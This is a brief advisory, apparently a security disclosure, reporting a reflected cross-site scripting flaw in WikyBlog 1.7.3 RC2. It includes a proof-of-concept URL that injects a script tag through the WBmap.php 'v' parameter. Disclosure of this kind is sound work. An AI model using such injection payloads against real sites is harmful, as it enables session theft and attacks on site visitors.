Search
Software Vulnerability Tested On Date
WikyBlog 1.7.3 RC2 Reflected Cross-site Scripting Windows Vista + XAMPP 7/5/2010
Description
A vulnerability in WikyBlog 1.7.3 RC2 can be exploited to execute arbitrary JavaScript.
Proof of Concept
http://localhost/WikyBlog-1.7.3rc2/include/WBmap.php?v=%3C/style%3E%3Cscript%3Ealert(0)%3C/script%3E